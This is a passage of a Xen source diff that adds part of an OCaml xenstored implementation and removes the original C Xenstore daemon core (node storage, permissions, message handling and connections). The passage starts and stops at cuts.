Constants.null_file_descr then Utils.barf_perror "Failed to bind to domain exception virq port\n"; + self#add_domain dom0; + Eventchan.get_channel () + ) + else Constants.null_file_descr + method initialise_store = + let path = Store.root_path ^ "tool" ^ Store.dividor_str ^ "xenstored" in + self#store#create_node path; + self#permissions#add self#store path 0 + method new_transaction domain store = + if not (Domain.is_unprivileged domain) || self#transactions#num_transactions_for_domain domain#id < self#options.Option.quota_max_transaction + then self#transactions#new_transaction domain store + else raise (Constants.Xs_error (Constants.ENOSPC, "Xenstored.xenstored#new_transaction", "Too many transactions")) + method options = m_options + method permissions = m_permissions + method remove_domain domain = + self#domains#remove domain; + Trace.destroy domain#id "connection"; + self#watches#remove_watches domain; + self#transactions#remove_domain domain + method transactions = m_transactions + method virq_port = m_virq_port + method watches = m_watches +end diff -r 10a8fae412c5 tools/xenstore/xenstored_core.c --- a/tools/xenstore/xenstored_core.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,1987 +0,0 @@ -/* - Simple prototype Xen Store Daemon providing simple tree-like database. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include "utils.h" -#include "list.h" -#include "talloc.h" -#include "xs_lib.h" -#include "xenstored_core.h" -#include "xenstored_watch.h" -#include "xenstored_transaction.h" -#include "xenstored_domain.h" -#include "xenctrl.h" -#include "tdb.h" - -#include "hashtable.h" - -extern int xce_handle; /* in xenstored_domain.c */ - -static bool verbose = false; -LIST_HEAD(connections); -static int tracefd = -1; -static bool recovery = true; -static bool remove_local = true; -static int reopen_log_pipe[2]; -static char *tracefile = NULL; -static TDB_CONTEXT *tdb_ctx; - -static void corrupt(struct connection *conn, const char *fmt, ...); -static void check_store(void); - -#define log(...) \ - do { \ - char *s = talloc_asprintf(NULL, __VA_ARGS__); \ - trace("%s\n", s); \ - syslog(LOG_ERR, "%s", s); \ - talloc_free(s); \ - } while (0) - - -int quota_nb_entry_per_domain = 1000; -int quota_nb_watch_per_domain = 128; -int quota_max_entry_size = 2048; /* 2K */ -int quota_max_transaction = 10; - -TDB_CONTEXT *tdb_context(struct connection *conn) -{ - /* conn = NULL used in manual_node at setup. */ - if (!conn || !conn->transaction) - return tdb_ctx; - return tdb_transaction_context(conn->transaction); -} - -bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb) -{ - if (rename(newname, xs_daemon_tdb()) != 0) - return false; - tdb_close(tdb_ctx); - tdb_ctx = talloc_steal(talloc_autofree_context(), newtdb); - return true; -} - -static char *sockmsg_string(enum xsd_sockmsg_type type) -{ - switch (type) { - case XS_DEBUG: return "DEBUG"; - case XS_DIRECTORY: return "DIRECTORY"; - case XS_READ: return "READ"; - case XS_GET_PERMS: return "GET_PERMS"; - case XS_WATCH: return "WATCH"; - case XS_UNWATCH: return "UNWATCH"; - case XS_TRANSACTION_START: return "TRANSACTION_START"; - case XS_TRANSACTION_END: return "TRANSACTION_END"; - case XS_INTRODUCE: return "INTRODUCE"; - case XS_RELEASE: return "RELEASE"; - case XS_GET_DOMAIN_PATH: return "GET_DOMAIN_PATH"; - case XS_WRITE: return "WRITE"; - case XS_MKDIR: return "MKDIR"; - case XS_RM: return "RM"; - case XS_SET_PERMS: return "SET_PERMS"; - case XS_WATCH_EVENT: return "WATCH_EVENT"; - case XS_ERROR: return "ERROR"; - case XS_IS_DOMAIN_INTRODUCED: return "XS_IS_DOMAIN_INTRODUCED"; - case XS_RESUME: return "RESUME"; - case XS_SET_TARGET: return "SET_TARGET"; - default: - return "**UNKNOWN**"; - } -} - -void trace(const char *fmt, ...) -{ - va_list arglist; - char *str; - char sbuf[1024]; - int ret, dummy; - - if (tracefd < 0) - return; - - /* try to use a static buffer */ - va_start(arglist, fmt); - ret = vsnprintf(sbuf, 1024, fmt, arglist); - va_end(arglist); - - if (ret <= 1024) { - dummy = write(tracefd, sbuf, ret); - return; - } - - /* fail back to dynamic allocation */ - va_start(arglist, fmt); - str = talloc_vasprintf(NULL, fmt, arglist); - va_end(arglist); - dummy = write(tracefd, str, strlen(str)); - talloc_free(str); -} - -static void trace_io(const struct connection *conn, - const struct buffered_data *data, - int out) -{ - unsigned int i; - time_t now; - struct tm *tm; - -#ifdef HAVE_DTRACE - dtrace_io(conn, data, out); -#endif - - if (tracefd < 0) - return; - - now = time(NULL); - tm = localtime(&now); - - trace("%s %p %04d%02d%02d %02d:%02d:%02d %s (", - out ? "OUT" : "IN", conn, - tm->tm_year + 1900, tm->tm_mon + 1, - tm->tm_mday, tm->tm_hour, tm->tm_min, tm->tm_sec, - sockmsg_string(data->hdr.msg.type)); - - for (i = 0; i < data->hdr.msg.len; i++) - trace("%c", (data->buffer[i] != '\0') ? data->buffer[i] : ' '); - trace(")\n"); -} - -void trace_create(const void *data, const char *type) -{ - trace("CREATE %s %p\n", type, data); -} - -void trace_destroy(const void *data, const char *type) -{ - trace("DESTROY %s %p\n", type, data); -} - -/** - * Signal handler for SIGHUP, which requests that the trace log is reopened - * (in the main loop). A single byte is written to reopen_log_pipe, to awaken - * the select() in the main loop. - */ -static void trigger_reopen_log(int signal __attribute__((unused))) -{ - char c = 'A'; - int dummy; - dummy = write(reopen_log_pipe[1], &c, 1); -} - - -static void reopen_log(void) -{ - if (tracefile) { - if (tracefd > 0) - close(tracefd); - - tracefd = open(tracefile, O_WRONLY|O_CREAT|O_APPEND, 0600); - - if (tracefd < 0) - perror("Could not open tracefile"); - else - trace("\n***\n"); - } -} - - -static bool write_messages(struct connection *conn) -{ - int ret; - struct buffered_data *out; - - out = list_top(&conn->out_list, struct buffered_data, list); - if (out == NULL) - return true; - - if (out->inhdr) { - if (verbose) - xprintf("Writing msg %s (%.*s) out to %p\n", - sockmsg_string(out->hdr.msg.type), - out->hdr.msg.len, - out->buffer, conn); - ret = conn->write(conn, out->hdr.raw + out->used, - sizeof(out->hdr) - out->used); - if (ret < 0) - return false; - - out->used += ret; - if (out->used < sizeof(out->hdr)) - return true; - - out->inhdr = false; - out->used = 0; - - /* Second write might block if non-zero. */ - if (out->hdr.msg.len && !conn->domain) - return true; - } - - ret = conn->write(conn, out->buffer + out->used, - out->hdr.msg.len - out->used); - if (ret < 0) - return false; - - out->used += ret; - if (out->used != out->hdr.msg.len) - return true; - - trace_io(conn, out, 1); - - list_del(&out->list); - talloc_free(out); - - return true; -} - -static int destroy_conn(void *_conn) -{ - struct connection *conn = _conn; - - /* Flush outgoing if possible, but don't block. */ - if (!conn->domain) { - fd_set set; - struct timeval none; - - FD_ZERO(&set); - FD_SET(conn->fd, &set); - none.tv_sec = none.tv_usec = 0; - - while (!list_empty(&conn->out_list) - && select(conn->fd+1, NULL, &set, NULL, &none) == 1) - if (!write_messages(conn)) - break; - close(conn->fd); - } - if (conn->target) - talloc_unlink(conn, conn->target); - list_del(&conn->list); - trace_destroy(conn, "connection"); - return 0; -} - - -static void set_fd(int fd, fd_set *set, int *max) -{ - if (fd < 0) - return; - FD_SET(fd, set); - if (fd > *max) - *max = fd; -} - - -static int initialize_set(fd_set *inset, fd_set *outset, int sock, int ro_sock, - struct timeval **ptimeout) -{ - static struct timeval zero_timeout = { 0 }; - struct connection *conn; - int max = -1; - - *ptimeout = NULL; - - FD_ZERO(inset); - FD_ZERO(outset); - - set_fd(sock, inset, &max); - set_fd(ro_sock, inset, &max); - set_fd(reopen_log_pipe[0], inset, &max); - - if (xce_handle != -1) - set_fd(xc_evtchn_fd(xce_handle), inset, &max); - - list_for_each_entry(conn, &connections, list) { - if (conn->domain) { - if (domain_can_read(conn) || - (domain_can_write(conn) && - !list_empty(&conn->out_list))) - *ptimeout = &zero_timeout; - } else { - set_fd(conn->fd, inset, &max); - if (!list_empty(&conn->out_list)) - FD_SET(conn->fd, outset); - } - } - - return max; -} - -static int destroy_fd(void *_fd) -{ - int *fd = _fd; - close(*fd); - return 0; -} - -/* Is child a subnode of parent, or equal? */ -bool is_child(const char *child, const char *parent) -{ - unsigned int len = strlen(parent); - - /* / should really be "" for this algorithm to work, but that's a - * usability nightmare. */ - if (streq(parent, "/")) - return true; - - if (strncmp(child, parent, len) != 0) - return false; - - return child[len] == '/' || child[len] == '\0'; -} - -/* If it fails, returns NULL and sets errno. */ -static struct node *read_node(struct connection *conn, const char *name) -{ - TDB_DATA key, data; - uint32_t *p; - struct node *node; - TDB_CONTEXT * context = tdb_context(conn); - - key.dptr = (void *)name; - key.dsize = strlen(name); - data = tdb_fetch(context, key); - - if (data.dptr == NULL) { - if (tdb_error(context) == TDB_ERR_NOEXIST) - errno = ENOENT; - else { - log("TDB error on read: %s", tdb_errorstr(context)); - errno = EIO; - } - return NULL; - } - - node = talloc(name, struct node); - node->name = talloc_strdup(node, name); - node->parent = NULL; - node->tdb = tdb_context(conn); - talloc_steal(node, data.dptr); - - /* Datalen, childlen, number of permissions */ - p = (uint32_t *)data.dptr; - node->num_perms = p[0]; - node->datalen = p[1]; - node->childlen = p[2]; - - /* Permissions are struct xs_permissions. */ - node->perms = (void *)&p[3]; - /* Data is binary blob (usually ascii, no nul). */ - node->data = node->perms + node->num_perms; - /* Children is strings, nul separated. */ - node->children = node->data + node->datalen; - - return node; -} - -static bool write_node(struct connection *conn, const struct node *node) -{ - /* - * conn will be null when this is called from manual_node. - * tdb_context copes with this. - */ - - TDB_DATA key, data; - void *p; - - key.dptr = (void *)node->name; - key.dsize = strlen(node->name); - - data.dsize = 3*sizeof(uint32_t) - + node->num_perms*sizeof(node->perms[0]) - + node->datalen + node->childlen; - - if (domain_is_unprivileged(conn) && data.dsize >= quota_max_entry_size) - goto error; - - data.dptr = talloc_size(node, data.dsize); - ((uint32_t *)data.dptr)[0] = node->num_perms; - ((uint32_t *)data.dptr)[1] = node->datalen; - ((uint32_t *)data.dptr)[2] = node->childlen; - p = data.dptr + 3 * sizeof(uint32_t); - - memcpy(p, node->perms, node->num_perms*sizeof(node->perms[0])); - p += node->num_perms*sizeof(node->perms[0]); - memcpy(p, node->data, node->datalen); - p += node->datalen; - memcpy(p, node->children, node->childlen); - - /* TDB should set errno, but doesn't even set ecode AFAICT. */ - if (tdb_store(tdb_context(conn), key, data, TDB_REPLACE) != 0) { - corrupt(conn, "Write of %s failed", key.dptr); - goto error; - } - return true; - error: - errno = ENOSPC; - return false; -} - -static enum xs_perm_type perm_for_conn(struct connection *conn, - struct xs_permissions *perms, - unsigned int num) -{ - unsigned int i; - enum xs_perm_type mask = XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER; - - if (!conn->can_write) - mask &= ~XS_PERM_WRITE; - - /* Owners and tools get it all... */ - if (!conn->id || perms[0].id == conn->id - || (conn->target && perms[0].id == conn->target->id)) - return (XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER) & mask; - - for (i = 1; i < num; i++) - if (perms[i].id == conn->id - || (conn->target && perms[i].id == conn->target->id)) - return perms[i].perms & mask; - - return perms[0].perms & mask; -} - -static char *get_parent(const char *node) -{ - char *slash = strrchr(node + 1, '/'); - if (!slash) - return talloc_strdup(node, "/"); - return talloc_asprintf(node, "%.*s", (int)(slash - node), node); -} - -/* What do parents say? */ -static enum xs_perm_type ask_parents(struct connection *conn, const char *name) -{ - struct node *node; - - do { - name = get_parent(name); - node = read_node(conn, name); - if (node) - break; - } while (!streq(name, "/")); - - /* No permission at root? We're in trouble. */ - if (!node) - corrupt(conn, "No permissions file at root"); - - return perm_for_conn(conn, node->perms, node->num_perms); -} - -/* We have a weird permissions system. You can allow someone into a - * specific node without allowing it in the parents. If it's going to - * fail, however, we don't want the errno to indicate any information - * about the node. */ -static int errno_from_parents(struct connection *conn, const char *node, - int errnum, enum xs_perm_type perm) -{ - /* We always tell them about memory failures. */ - if (errnum == ENOMEM) - return errnum; - - if (ask_parents(conn, node) & perm) - return errnum; - return EACCES; -} - -/* If it fails, returns NULL and sets errno. */ -struct node *get_node(struct connection *conn, - const char *name, - enum xs_perm_type perm) -{ - struct node *node; - - if (!name || !is_valid_nodename(name)) { - errno = EINVAL; - return NULL; - } - node = read_node(conn, name); - /* If we don't have permission, we don't have node. */ - if (node) { - if ((perm_for_conn(conn, node->perms, node->num_perms) & perm) - != perm) { - errno = EACCES; - node = NULL; - } - } - /* Clean up errno if they weren't supposed to know. */ - if (!node) - errno = errno_from_parents(conn, name, errno, perm); - return node; -} - -static struct buffered_data *new_buffer(void *ctx) -{ - struct buffered_data *data; - - data = talloc_zero(ctx, struct buffered_data); - if (data == NULL) - return NULL; - - data->inhdr = true; - return data; -} - -/* Return length of string (including nul) at this offset. - * If there is no nul, returns 0 for failure. - */ -static unsigned int get_string(const struct buffered_data *data, - unsigned int offset) -{ - const char *nul; - - if (offset >= data->used) - return 0; - - nul = memchr(data->buffer + offset, 0, data->used - offset); - if (!nul) - return 0; - - return nul - (data->buffer + offset) + 1; -} - -/* Break input into vectors, return the number, fill in up to num of them. - * Always returns the actual number of nuls in the input. Stores the - * positions of the starts of the nul-terminated strings in vec. - * Callers who use this and then rely only on vec[] will - * ignore any data after the final nul. - */ -unsigned int get_strings(struct buffered_data *data, - char *vec[], unsigned int num) -{ - unsigned int off, i, len; - - off = i = 0; - while ((len = get_string(data, off)) != 0) { - if (i < num) - vec[i] = data->buffer + off; - i++; - off += len; - } - return i; -} - -void send_reply(struct connection *conn, enum xsd_sockmsg_type type, - const void *data, unsigned int len) -{ - struct buffered_data *bdata; - - /* Message is a child of the connection context for auto-cleanup. */ - bdata = new_buffer(conn); - bdata->buffer = talloc_array(bdata, char, len); - - /* Echo request header in reply unless this is an async watch event. */ - if (type != XS_WATCH_EVENT) { - memcpy(&bdata->hdr.msg, &conn->in->hdr.msg, - sizeof(struct xsd_sockmsg)); - } else { - memset(&bdata->hdr.msg, 0, sizeof(struct xsd_sockmsg)); - } - - /* Update relevant header fields and fill in the message body. */ - bdata->hdr.msg.type = type; - bdata->hdr.msg.len = len; - memcpy(bdata->buffer, data, len); - - /* Queue for later transmission. */ - list_add_tail(&bdata->list, &conn->out_list); -} - -/* Some routines (write, mkdir, etc) just need a non-error return */ -void send_ack(struct connection *conn, enum xsd_sockmsg_type type) -{ - send_reply(conn, type, "OK", sizeof("OK")); -} - -void send_error(struct connection *conn, int error) -{ - unsigned int i; - - for (i = 0; error != xsd_errors[i].errnum; i++) { - if (i == ARRAY_SIZE(xsd_errors) - 1) { - eprintf("xenstored: error %i untranslatable", error); - i = 0; /* EINVAL */ - break; - } - } - send_reply(conn, XS_ERROR, xsd_errors[i].errstring, - strlen(xsd_errors[i].errstring) + 1); -} - -static bool valid_chars(const char *node) -{ - /* Nodes can have lots of crap. */ - return (strspn(node, - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - "abcdefghijklmnopqrstuvwxyz" - "0123456789-/_@") == strlen(node)); -} - -bool is_valid_nodename(const char *node) -{ - /* Must start in /. */ - if (!strstarts(node, "/")) - return false; - - /* Cannot end in / (unless it's just "/"). */ - if (strends(node, "/") && !streq(node, "/")) - return false; - - /* No double //. */ - if (strstr(node, "//")) - return false; - - if (strlen(node) > XENSTORE_ABS_PATH_MAX) - return false; - - return valid_chars(node); -} - -/* We expect one arg in the input: return NULL otherwise. - * The payload must contain exactly one nul, at the end. - */ -static const char *onearg(struct buffered_data *in) -{ - if (!in->used || get_string(in, 0) != in->used) - return NULL; - return in->buffer; -} - -static char *perms_to_strings(const void *ctx, - struct xs_permissions *perms, unsigned int num, - unsigned int *len) -{ - unsigned int i; - char *strings = NULL; - char buffer[MAX_STRLEN(unsigned int) + 1]; - - for (*len = 0, i = 0; i < num; i++) { - if (!xs_perm_to_string(&perms[i], buffer, sizeof(buffer))) - return NULL; - - strings = talloc_realloc(ctx, strings, char, - *len + strlen(buffer) + 1); - strcpy(strings + *len, buffer); - *len += strlen(buffer) + 1; - } - return strings; -} - -char *canonicalize(struct connection *conn, const char *node) -{ - const char *prefix; - - if (!node || (node[0] == '/') || (node[0] == '@')) - return (char *)node; - prefix = get_implicit_path(conn); - if (prefix) - return talloc_asprintf(node, "%s/%s", prefix, node); - return (char *)node; -} - -bool check_event_node(const char *node) -{ - if (!node || !strstarts(node, "@")) { - errno = EINVAL; - return false; - } - return true; -} - -static void send_directory(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_READ); - if (!node) { - send_error(conn, errno); - return; - } - - send_reply(conn, XS_DIRECTORY, node->children, node->childlen); -} - -static void do_read(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_READ); - if (!node) { - send_error(conn, errno); - return; - } - - send_reply(conn, XS_READ, node->data, node->datalen); -} - -static void delete_node_single(struct connection *conn, struct node *node) -{ - TDB_DATA key; - - key.dptr = (void *)node->name; - key.dsize = strlen(node->name); - - if (tdb_delete(tdb_context(conn), key) != 0) { - corrupt(conn, "Could not delete '%s'", node->name); - return; - } - domain_entry_dec(conn, node); -} - -/* Must not be / */ -static char *basename(const char *name) -{ - return strrchr(name, '/') + 1; -} - -static struct node *construct_node(struct connection *conn, const char *name) -{ - const char *base; - unsigned int baselen; - struct node *parent, *node; - char *children, *parentname = get_parent(name); - - /* If parent doesn't exist, create it. */ - parent = read_node(conn, parentname); - if (!parent) - parent = construct_node(conn, parentname); - if (!parent) - return NULL; - - if (domain_entry(conn) >= quota_nb_entry_per_domain) - return NULL; - - /* Add child to parent. */ - base = basename(name); - baselen = strlen(base) + 1; - children = talloc_array(name, char, parent->childlen + baselen); - memcpy(children, parent->children, parent->childlen); - memcpy(children + parent->childlen, base, baselen); - parent->children = children; - parent->childlen += baselen; - - /* Allocate node */ - node = talloc(name, struct node); - node->tdb = tdb_context(conn); - node->name = talloc_strdup(node, name); - - /* Inherit permissions, except domains own what they create */ - node->num_perms = parent->num_perms; - node->perms = talloc_memdup(node, parent->perms, - node->num_perms * sizeof(node->perms[0])); - if (conn && conn->id) - node->perms[0].id = conn->id; - - /* No children, no data */ - node->children = node->data = NULL; - node->childlen = node->datalen = 0; - node->parent = parent; - domain_entry_inc(conn, node); - return node; -} - -static int destroy_node(void *_node) -{ - struct node *node = _node; - TDB_DATA key; - - if (streq(node->name, "/")) - corrupt(NULL, "Destroying root node!"); - - key.dptr = (void *)node->name; - key.dsize = strlen(node->name); - - tdb_delete(node->tdb, key); - return 0; -} - -static struct node *create_node(struct connection *conn, - const char *name, - void *data, unsigned int datalen) -{ - struct node *node, *i; - - node = construct_node(conn, name); - if (!node) - return NULL; - - node->data = data; - node->datalen = datalen; - - /* We write out the nodes down, setting destructor in case - * something goes wrong. */ - for (i = node; i; i = i->parent) { - if (!write_node(conn, i)) { - domain_entry_dec(conn, i); - return NULL; - } - talloc_set_destructor(i, destroy_node); - } - - /* OK, now remove destructors so they stay around */ - for (i = node; i; i = i->parent) - talloc_set_destructor(i, NULL); - return node; -} - -/* path, data... */ -static void do_write(struct connection *conn, struct buffered_data *in) -{ - unsigned int offset, datalen; - struct node *node; - char *vec[1] = { NULL }; /* gcc4 + -W + -Werror fucks code. */ - char *name; - - /* Extra "strings" can be created by binary data. */ - if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - offset = strlen(vec[0]) + 1; - datalen = in->used - offset; - - name = canonicalize(conn, vec[0]); - node = get_node(conn, name, XS_PERM_WRITE); - if (!node) { - /* No permissions, invalid input? */ - if (errno != ENOENT) { - send_error(conn, errno); - return; - } - node = create_node(conn, name, in->buffer + offset, datalen); - if (!node) { - send_error(conn, errno); - return; - } - } else { - node->data = in->buffer + offset; - node->datalen = datalen; - if (!write_node(conn, node)){ - send_error(conn, errno); - return; - } - } - - add_change_node(conn->transaction, name, false); - fire_watches(conn, name, false); - send_ack(conn, XS_WRITE); -} - -static void do_mkdir(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_WRITE); - - /* If it already exists, fine. */ - if (!node) { - /* No permissions? */ - if (errno != ENOENT) { - send_error(conn, errno); - return; - } - node = create_node(conn, name, NULL, 0); - if (!node) { - send_error(conn, errno); - return; - } - add_change_node(conn->transaction, name, false); - fire_watches(conn, name, false); - } - send_ack(conn, XS_MKDIR); -} - -static void delete_node(struct connection *conn, struct node *node) -{ - unsigned int i; - - /* Delete self, then delete children. If we crash, then the worst - that can happen is the children will continue to take up space, but - will otherwise be unreachable. */ - delete_node_single(conn, node); - - /* Delete children, too. */ - for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) { - struct node *child; - - child = read_node(conn, - talloc_asprintf(node, "%s/%s", node->name, - node->children + i)); - if (child) { - delete_node(conn, child); - } - else { - trace("delete_node: No child '%s/%s' found!\n", - node->name, node->children + i); - /* Skip it, we've already deleted the parent. */ - } - } -} - - -/* Delete memory using memmove. */ -static void memdel(void *mem, unsigned off, unsigned len, unsigned total) -{ - memmove(mem + off, mem + off + len, total - off - len); -} - - -static bool remove_child_entry(struct connection *conn, struct node *node, - size_t offset) -{ - size_t childlen = strlen(node->children + offset); - memdel(node->children, offset, childlen + 1, node->childlen); - node->childlen -= childlen + 1; - return write_node(conn, node); -} - - -static bool delete_child(struct connection *conn, - struct node *node, const char *childname) -{ - unsigned int i; - - for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) { - if (streq(node->children+i, childname)) { - return remove_child_entry(conn, node, i); - } - } - corrupt(conn, "Can't find child '%s' in %s", childname, node->name); - return false; -} - - -static int _rm(struct connection *conn, struct node *node, const char *name) -{ - /* Delete from parent first, then if we crash, the worst that can - happen is the child will continue to take up space, but will - otherwise be unreachable. */ - struct node *parent = read_node(conn, get_parent(name)); - if (!parent) { - send_error(conn, EINVAL); - return 0; - } - - if (!delete_child(conn, parent, basename(name))) { - send_error(conn, EINVAL); - return 0; - } - - delete_node(conn, node); - return 1; -} - - -static void internal_rm(const char *name) -{ - char *tname = talloc_strdup(NULL, name); - struct node *node = read_node(NULL, tname); - if (node) - _rm(NULL, node, tname); - talloc_free(node); - talloc_free(tname); -} - - -static void do_rm(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_WRITE); - if (!node) { - /* Didn't exist already? Fine, if parent exists. */ - if (errno == ENOENT) { - node = read_node(conn, get_parent(name)); - if (node) { - send_ack(conn, XS_RM); - return; - } - /* Restore errno, just in case. */ - errno = ENOENT; - } - send_error(conn, errno); - return; - } - - if (streq(name, "/")) { - send_error(conn, EINVAL); - return; - } - - if (_rm(conn, node, name)) { - add_change_node(conn->transaction, name, true); - fire_watches(conn, name, true); - send_ack(conn, XS_RM); - } -} - - -static void do_get_perms(struct connection *conn, const char *name) -{ - struct node *node; - char *strings; - unsigned int len; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_READ); - if (!node) { - send_error(conn, errno); - return; - } - - strings = perms_to_strings(node, node->perms, node->num_perms, &len); - if (!strings) - send_error(conn, errno); - else - send_reply(conn, XS_GET_PERMS, strings, len); -} - -static void do_set_perms(struct connection *conn, struct buffered_data *in) -{ - unsigned int num; - struct xs_permissions *perms; - char *name, *permstr; - struct node *node; - - num = xs_count_strings(in->buffer, in->used); - if (num < 2) { - send_error(conn, EINVAL); - return; - } - - /* First arg is node name. */ - name = canonicalize(conn, in->buffer); - permstr = in->buffer + strlen(in->buffer) + 1; - num--; - - /* We must own node to do this (tools can do this too). */ - node = get_node(conn, name, XS_PERM_WRITE|XS_PERM_OWNER); - if (!node) { - send_error(conn, errno); - return; - } - - perms = talloc_array(node, struct xs_permissions, num); - if (!xs_strings_to_perms(perms, num, permstr)) { - send_error(conn, errno); - return; - } - - /* Unprivileged domains may not change the owner. */ - if (domain_is_unprivileged(conn) && - perms[0].id != node->perms[0].id) { - send_error(conn, EPERM); - return; - } - - domain_entry_dec(conn, node); - node->perms = perms; - node->num_perms = num; - domain_entry_inc(conn, node); - - if (!write_node(conn, node)) { - send_error(conn, errno); - return; - } - - add_change_node(conn->transaction, name, false); - fire_watches(conn, name, false); - send_ack(conn, XS_SET_PERMS); -} - -static void do_debug(struct connection *conn, struct buffered_data *in) -{ - int num; - - if (conn->id != 0) { - send_error(conn, EACCES); - return; - } - - num = xs_count_strings(in->buffer, in->used); - - if (streq(in->buffer, "print")) { - if (num < 2) { - send_error(conn, EINVAL); - return; - } - xprintf("debug: %s", in->buffer + get_string(in, 0)); - } - - if (streq(in->buffer, "check")) - check_store(); - - send_ack(conn, XS_DEBUG); -} - -/* Process "in" for conn: "in" will vanish after this conversation, so - * we can talloc off it for temporary variables. May free "conn". - */ -static void process_message(struct connection *conn, struct buffered_data *in) -{ - struct transaction *trans; - - trans = transaction_lookup(conn, in->hdr.msg.tx_id); - if (IS_ERR(trans)) { - send_error(conn, -PTR_ERR(trans)); - return; - } - - assert(conn->transaction == NULL); - conn->transaction = trans; - - switch (in->hdr.msg.type) { - case XS_DIRECTORY: - send_directory(conn, onearg(in)); - break; - - case XS_READ: - do_read(conn, onearg(in)); - break; - - case XS_WRITE: - do_write(conn, in); - break; - - case XS_MKDIR: - do_mkdir(conn, onearg(in)); - break; - - case XS_RM: - do_rm(conn, onearg(in)); - break; - - case XS_GET_PERMS: - do_get_perms(conn, onearg(in)); - break; - - case XS_SET_PERMS: - do_set_perms(conn, in); - break; - - case XS_DEBUG: - do_debug(conn, in); - break; - - case XS_WATCH: - do_watch(conn, in); - break; - - case XS_UNWATCH: - do_unwatch(conn, in); - break; - - case XS_TRANSACTION_START: - do_transaction_start(conn, in); - break; - - case XS_TRANSACTION_END: - do_transaction_end(conn, onearg(in)); - break; - - case XS_INTRODUCE: - do_introduce(conn, in); - break; - - case XS_IS_DOMAIN_INTRODUCED: - do_is_domain_introduced(conn, onearg(in)); - break; - - case XS_RELEASE: - do_release(conn, onearg(in)); - break; - - case XS_GET_DOMAIN_PATH: - do_get_domain_path(conn, onearg(in)); - break; - - case XS_RESUME: - do_resume(conn, onearg(in)); - break; - - case XS_SET_TARGET: - do_set_target(conn, in); - break; - - default: - eprintf("Client unknown operation %i", in->hdr.msg.type); - send_error(conn, ENOSYS); - break; - } - - conn->transaction = NULL; -} - -static void consider_message(struct connection *conn) -{ - if (verbose) - xprintf("Got message %s len %i from %p\n", - sockmsg_string(conn->in->hdr.msg.type), - conn->in->hdr.msg.len, conn); - - process_message(conn, conn->in); - - talloc_free(conn->in); - conn->in = new_buffer(conn); -} - -/* Errors in reading or allocating here mean we get out of sync, so we - * drop the whole client connection. */ -static void handle_input(struct connection *conn) -{ - int bytes; - struct buffered_data *in = conn->in; - - /* Not finished header yet? */ - if (in->inhdr) { - bytes = conn->read(conn, in->hdr.raw + in->used, - sizeof(in->hdr) - in->used); - if (bytes < 0) - goto bad_client; - in->used += bytes; - if (in->used != sizeof(in->hdr)) - return; - - if (in->hdr.msg.len > XENSTORE_PAYLOAD_MAX) { - syslog(LOG_ERR, "Client tried to feed us %i", - in->hdr.msg.len); - goto bad_client; - } - - in->buffer = talloc_array(in, char, in->hdr.msg.len); - if (!in->buffer) - goto bad_client; - in->used = 0; - in->inhdr = false; - return; - } - - bytes = conn->read(conn, in->buffer + in->used, - in->hdr.msg.len - in->used); - if (bytes < 0) - goto bad_client; - - in->used += bytes; - if (in->used != in->hdr.msg.len) - return; - - trace_io(conn, in, 0); - consider_message(conn); - return; - -bad_client: - /* Kill it. */ - talloc_free(conn); -} - -static void handle_output(struct connection *conn) -{ - if (!write_messages(conn)) - talloc_free(conn); -} - -struct connection *new_connection(connwritefn_t *write, connreadfn_t *read) -{ - struct connection *new; - - new = talloc_zero(talloc_autofree_context(), struct connection); - if (!new) - return NULL; - - new->fd = -1; - new->write = write; - new->read = read; - new->can_write = true; - new->transaction_started = 0; - INIT_LIST_HEAD(&new->out_list); - INIT_LIST_HEAD(&new->watches); - INIT_LIST_HEAD(&new->transaction_list); - - new->in = new_buffer(new); - if (new->in == NULL) { - talloc_free(new); - return NULL; - } - - list_add_tail(&new->list, &connections); - talloc_set_destructor(new, destroy_conn); - trace_create(new, "connection"); - return new; -} - -static int writefd(struct connection *conn, const void *data, unsigned int len) -{ - int rc; - - while ((rc = write(conn->fd, data, len)) < 0) { - if (errno == EAGAIN) { - rc = 0; - break; - } - if (errno != EINTR) - break; - } - - return rc; -} - -static int readfd(struct connection *conn, void *data, unsigned int len) -{ - int rc; - - while ((rc = read(conn->fd, data, len)) < 0) { - if (errno == EAGAIN) { - rc = 0; - break; - } - if (errno != EINTR) - break; - } - - /* Reading zero length means we're done with this connection. */ - if ((rc == 0) && (len != 0)) { - errno = EBADF; - rc = -1; - } - - return rc; -} - -static void accept_connection(int sock, bool canwrite) -{ - int fd; - struct connection *conn; - - fd = accept(sock, NULL, NULL); - if (fd < 0) - return; - - conn = new_connection(writefd, readfd); - if (conn) { - conn->fd = fd; - conn->can_write = canwrite; - } else - close(fd); -} - -#define TDB_FLAGS 0 - -/* We create initial nodes manually. */ -static void manual_node(const char *name, const char *child) -{ - struct node *node; - struct xs_permissions perms = { .id = 0, .perms = XS_PERM_NONE }; - - node = talloc_zero(NULL, struct node); - node->name = name; - node->perms = &perms; - node->num_perms = 1; - node->children = (char 